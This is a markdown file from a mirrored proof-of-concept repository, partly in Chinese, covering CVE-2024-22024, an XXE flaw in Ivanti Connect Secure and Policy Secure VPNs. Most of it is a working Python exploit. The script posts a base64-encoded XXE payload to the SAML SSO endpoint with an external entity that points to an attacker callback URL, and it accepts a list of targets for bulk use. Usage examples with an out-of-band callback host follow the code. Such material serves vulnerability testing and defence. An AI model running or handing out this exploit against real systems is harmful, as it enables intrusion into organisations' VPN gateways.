admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-05-05 18:27:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Ivanti/CVE-2024-22024.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

102 lines
3.5 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Ivanti Pulse Connect Secure VPN存在XXE漏洞(CVE-2024-22024)
Ivanti Pulse Connect Secure VPN存在XXE漏洞攻击者可构造恶意请求触发XXE结合相关功能造成远程代码执行。
## 影响范围
- ivanti connect_secure 22.4
- ivanti connect_secure 22.5
- ivanti connect_secure 9.1
- ivanti policy_secure 22.5
- ivanti zero_trust_access 22.6
## poc
```python
import base64
import requests
import argparse
from pathlib import Path
import urllib3
from urllib3.exceptions import InsecureRequestWarning
# Suppress only the single InsecureRequestWarning from urllib3
urllib3.disable_warnings(InsecureRequestWarning)
'''
PoC by Abdulla
CVE-2024-22024 (XXE) for Ivanti Connect Secure and Ivanti Policy Secure
Remediation:
https://forums.ivanti.com/s/article/CVE-2024-22024-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US
'''
def send_request(target_url, attacker_url, timeout):
xml_payload_template = """<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % xxe SYSTEM "{}"> %xxe;]><r></r>"""
xml_payload = xml_payload_template.format(attacker_url + "/test") # Format with the provided external URL
encoded_payload = base64.b64encode(xml_payload.encode()).decode() # Encode in base64
data = {'SAMLRequest': encoded_payload} # Data for POST request
# Attempt the POST request with the specified timeout
try:
response = requests.post(target_url+"/dana-na/auth/saml-sso.cgi", data=data, verify=False, timeout=timeout)
print(f"Response from {target_url}: {response.status_code}")
except requests.exceptions.Timeout:
print(f"Request to {target_url} timed out.")
except Exception as e:
print(f"Error sending request to {target_url}.")
def main(target_urls, attacker_url, timeout):
if Path(target_urls).is_file(): # If target_urls is a file path
with open(target_urls, 'r') as file:
urls = file.read().splitlines()
for url in urls:
send_request(url, attacker_url, timeout)
else: # Assume target_urls is a single URL
send_request(target_urls, attacker_url, timeout)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Check for CVE-2024-22024 vulnerability in Ivanti Connect Secure by Abdulla.")
parser.add_argument("-u", "--target_url", required=True, help="The target URL or file with URLs where the SAML request should be sent")
parser.add_argument("-c", "--attacker_url", required=True, help="The attacker URL to include in the XXE payload")
parser.add_argument("-t", "--timeout", type=int, default=3, help="Timeout in seconds for the request (default is 3 seconds)")
args = parser.parse_args()
main(args.target_url, args.attacker_url, args.timeout)
```
### Parameters
- `-u` or `--target_url`: The target Ivanti Connect Secure (ICS) URL or file with list of URLs.
- `-c` or `--attacker_url`: The attacker URL (generate one using Burp Collaborator, ngrok, or by using a unique URL from [Webhook.site](https://webhook.site/))
- `-t` or `--timeout`: Timeout in seconds for the request (default is 3 seconds)
### How to use
Testing a single URL:
```
python .\cve_2024_22024.py -u http://vpn.example.com -c http://potatodynamicdns.oastify.com
```
Testing list of URLs:
```
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com
```
Using a different timeout (5 seconds):
```
python .\cve_2024_22024.py -u .\urls_list.txt -c http://potatodynamicdns.oastify.com -t 5
```
## 漏洞来源
- https://github.com/lal0ne/vulnerability/tree/main/Ivanti/CVE-2024-22024
Reference in New Issue View Git Blame Copy Permalink